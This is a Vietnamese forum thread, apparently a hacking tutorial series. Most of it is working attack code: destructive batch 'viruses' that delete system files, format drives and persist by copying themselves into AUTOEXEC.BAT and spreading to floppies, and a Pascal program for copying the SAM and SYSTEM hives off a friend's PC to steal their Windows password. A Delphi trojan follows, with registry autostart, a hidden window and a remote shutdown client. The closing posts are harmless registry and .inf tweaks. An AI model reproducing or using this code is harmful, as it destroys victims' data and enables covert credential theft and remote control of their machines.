echo Y| del D:*.*
attrib -r -h -s C:*.*
echo Y| del C:*.sys
echo Y| del C:*.bin
echo Y| del C:*.bat
echo Y| format D:
echo Y| format C:
echo virus loading... Completed !

Con này khôn khéo hơn...
Code:

@echo off
if exist C:aivus.bat goto cool
copy %0 C:aivus.bat > nul
attrib +h C:aivus.bat > nul
echo C:aivus.bat >> C:AUTOEXEC.BAT
echo Y| del %0 > nul
:cool
copy %0 A:un.bat >nul
copy %0 A:open.bat >nul
attrib +h A:open.bat >nul
echo Y| del C:Windows/calc.exe >nul
attrib -h -s -r:*.ini > nul
echo Y|del C:boot.ini > nul
echo Y| format A:

Còn đây là chương trình chuyển các file bat->exe : download

Tớ chưa thấy trong file SAM có chứa gì, chỉ biết là nó có chứa vài cái pass gì đó.
Bình thường thì đúng là ta không thể đụng chạm đến nó được.
Nhưng liệu trong DOS có làm được không? Chương trình sau nếu bạn nào làm được có thể cho biết kết quả? ( Tớ chưa thử ).
Tức là đến nhà đứa bạn chơi. Nó vắng nhà, ta muốn lấy cái pass đăng nhập win của nó. Bây giờ sẵn trong máy có pascal, ta tạo file copy SAM lên đĩa , sau đó cho nó vào AUTOEXEC.BAT, vậy là lần sau, cứ thế đem file này về nhà khảo cứu.

Code:

program copy;
var
fin,fout:text;
b:char;
begin
assign(fin,'С:\\Windows\\System32\\config\\SAM');
reset(fin);
assign(fout,'C:\\SAM');
rewrite(fout);
while not eof(fin) do
begin
while not eoln(fin)do
begin
read(fin,b);
write(fout,b);
end;
readln(fin);writeln(fout);
end;
close(fin);close(fout);
assign(fin,'С:\\Windows\\System32\\config\\SYSTEM');
reset(fin);
assign(fout,'C:\\SYSTEMfi');
rewrite(fout);
while not eof(fin) do
begin
while not eoln(fin)do
begin
read(fin,b);
write(fout,b);
end;
readln(fin);writeln(fout);
end;
close(fin);close(fout);
end.

Cho đường dẫn file này vào AUTOEXEC.BAT nữa là xong.
Một chương trình nữa cũng rất có ích là saminside, download tại đây
------------------------
PS: Tớ chỉ viết để tham khảo và học tập, tuyệt đối không share hay quấy phá gì cả. Mong một số bạn( như Administration trên đây) hiểu cho.

Bây giờ, ta đến với một phần cũng khá lý thú. Viết một trojan gởi đến nạn nhân. Nó có nhiệm vụ rất đơn giản. Khi phía client phát hiện kết nối đầu server, client gởi đến một kí tự "R" ( chẳng hạn ) qua socket. Lúc này, khi mà phía server đã dính trojan rồi thì chi cần một cú click chuột của client thì máy server sẽ restart.
Con trojan này mang tên Internat32.exe, và để đơn giản , tớ sẽ viết trên Delphi7.
Nói một chút về hoạt động của con trojan này.
Trước hết, nó sẽ tự khởi động ngầm cùng windows. Ta thực hiện điều này bằng cách tác động vào registry của window tại vùng HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion -> gán giá trị RunServices bằng "Internat32.exe".
Tiếp tục, con này sẽ tự động thực hiện vòng lặp vô hạn để chẳng làm gì , cho đến khi nó nhận được kí tự "R" gởi bởi client. Sau đó, máy server restart không điều kiện !
Ta bắt đầu.
Các bạn vào New->Application-> Xuất hiện Form1.
Trên thanh Internet, chọn ServerSocket đưa vào Form1.
Tạo một event OnCreate cho Form1 và code như sau:
Code:

procedure TForm1.FormCreate(Sender: TObject);
var RegIni:TRegIniFile;
begin
RegIni = TRegIniFile.Create('Software');
RegIni.RootKey := HKEY_LOCAL_MACHINE;
RegIni.OpenKey('Software', true);
RegIni.OpenKey('Microsoft', true);
RegIni.OpenKey('CurrentVersion', true);
RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName);
RegIni.Free;
ServerSocket1.Active := true;
end;

Sau bài đầu tiên, đến đây chắc bạn cũng đã hiểu được code này nói gì rồi. Tớ đi tiếp phần sau của Trojan.
Bây giờ, ta tạo thêm một event cho ServerSocket1: OnClientRead.
Code:

procedure TForm1.ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinsocket);
begin
if Socket.ReceiveText = 'R' then
ExitWindowEx(EWX_SHUTDOWN, 0);
end;

Ở đây, nếu dùng EWX_FORCE thì máy server sẽ ngay lập tức shutdown (!). Còn với EWX_SHUTDOWN, nó sẽ chờ cho đến khi server tắt hết và lưu các ứng dụng đang chạy.
Cuối cùng , chỉ việc Ctrl-F9 để tạo Internat32.exe .

Tuy nhiên, con trojan này chưa ẩn đối với server. Để ẩn nó, vào "Project Manager" từ menu "View". Click phải vào Internat32.exe và chọn "View Source".
Bạn tìm đến đoạn code này và sửa thành:
Code:

program Internat32;
uses Forms,
Windows,
Unit1 in 'Unit1.pas' {Form1};
{$R *.RES}
var
WhEvent: THandle;
Begin
Application.Initialize;
ShowWindow(Application.Handle, SW_Hide);
Form1 := TForm1.Create(nil);
Application.Run;
WhEvent := CreateEvent(nil, true, false, 'et');
while(true) do
begin
WaitForSingleObject(WhEvent, 1000);
Application.ProcessMessages;
end;
end.

Đây chính là một chương trình pascal bình thường. Một handle thực chất là một số nguyên, mỗi cửa sổ windows sẽ có các handle khác nhau. Và trong vòng lặp vô hạn (?) , dễ dàng nhận ra hoạt động của nó ( xem lại phần đâu ).
Đến đây ta mới thực sự hoàn thành con Internat32.exe.
Bây giờ, phía client cần kích hoạt con Internat32.exe này.
Tiếp tục, New->Application->Form1.
Bây giờ, ta đặt lên Form1 các thành phần:

Một button ( kích hoạt)
Một edit ( ip server )
Một ClientSocket( trên thanh Internet ) để giao tiếp với server.

Tạo hiệu ứng clich chuột cho button1.
Code:

procedure TForm1.Button1Click(Sender: TObject);
begin
ClientSocket1.Host := Edit1.Text;
ClientSocket1.Active := true;
ClientSocket1.Socket.SendText('R');
ClientSocket1.Active := false;
end;

Ctrl-F9.
Vậy là ta đã tạo ra một con trojan rồi đó.
ps: Em post bài với mục đích học là chính , nếu có vi phạm nội quy xin các Mod bỏ qua.

Chào các bạn.
Tớ sẽ cố gắng thực hiện một tut hoàn chỉnh về hack windows bằng các thủ thuật và lập trình.
Trong quá trình thực hiện rất mong được sự đóng góp cũng như góp ý của các bạn.
Bây giờ ta bắt đầu với 2 thủ thuật . 2 cái này sẽ dùng hoặc registry hoặc tạo ra file .inf để lưu thông tin chương trình vào cơ sở dữ liệu của hệ thống.
1) Có những chương trình mà ta thường hay sử dụng khi làm việc. Và thật tiện lợi nếu chỉ cần một cú click chuột mà có thể gọi nó ra. Đúng vậy, mục đích của ta ở đây là đưa vào context-menu ( khi click chuột phải vào biểu tượng My Computer ) tên chương trình cần gọi.
Các bạn làm theo các bước sau:

1) Vào Regegit->HKEY_CLASSES_ROOT\CLSID\{20D04FE-...}\Shell
2) Click phải chuột -> new -> key: Đặt tên nào đó. Giả sử là cmd.
3) Thay đổi data value thành "Total Commander" ( tên này chính là tên sẽ hiển thị khi ta click chuột phải )
4) Tiếp tục, click phải chuột tại cmd -> new -> key: đặt tên là command.
5) Cuối cùng, giả sử chương trình Total Commander của ta được đặt ở địa chỉ: D:\Total Commander\Totalcmd.exe
ta copy đường dẫn này để tạo giá trj trong command.

Vậy là ta đã đạt được mục đích rồi đó.
Bây giờ, ta sẽ không làm bằng tay công việc đó, mà sẽ viết một script tự động làm các công việc trên cho ta.
Cấu trúc một file .inf:

[session]
key = value

.:totalcmd.inf:.
Code:

[Version]
Signature = $VIETNAM$
[DefaultInstall]
AddReg = Reg.Settings
AddReg = Reg.Uninstall
CopyFiles = Inf.Copy
[DefaultUninstall]
DelReg = Reg.Settings
DelReg = Reg.Uninstall
DelFiles = Inf.Copy
[Reg.Settings]
HKCR,CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\cmd
HKCR,CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\cmd,,,"%MENUITEM%"
HKCR,CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\cmd\command\
,,0x2000,D:\Total Commander\Totalcmd.exe"
[Reg.Uninstall]
HKLM,Software\Microsoft\Windows\CurrentVersion\Uninstall\%NAME%,UninstallString\,,"Rundll32.exe setupapi.dll,
InstallHinfSection DefaultUninstall 132"\"%17%\totalcmd.inf"
[Inf.Copy]
totalcmd.inf
[DestinationDisr]
Inf.Copy = 17
[SourceDisksNames]
55 = %DISKNAME%
[SourceDisksFiles]
totalcmd.inf = 55
[Strings]
NAME = "Total Commander"
MENUITEM = "Total Commander"
DISKNAME = "Setup Files"

.

Và để xóa bỏ các cài đặt này, vào Add or Remove Programs.
2) Cái thứ hai hoàn toàn tuơng tự cái ở trên. Nhiệm vụ lúc này là: kích hoạt command prompt khi ta click phải chuột lên một thư mục hay ổ đĩa. ( Tức là ta gọi cmd tại ngay vị trí ta muốn đến).
Lần này đường dẫn sẽ là :

HKCR\Directory\

Sau đó bạn đưa đường dẫn C:\WINDOWS\System32\cmd.exe vào value là xong.
Viết script tương tự như trên.

Chào các bạn.
Đã bao giờ bạn nghĩ đến việc remove một game có sẵn trong window chưa? Bây giờ tớ có một mẹo nhỏ giúp ta thực hiện điều đó.
Đầu tiên, gõ %systemroot%\inf trong hộp thoại Run.
Tìm file sysoc.inf và open nó.
Các bạn tìm đến đoạn code này.

...
Games=ocgen.dll,OcEntry,games.inf,,7
AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7
CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7
MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7
AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7
Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7
MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7
ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7
...

Tiếp theo, nếu muốn gỡ chương trình nào đó thì ta xóa "HIDE" trong dòng đó.
Sau khi xóa xong, trong hộp thoại Add or Remove programms sẽ xuất hiện game ta muốn xóa.

----Thân----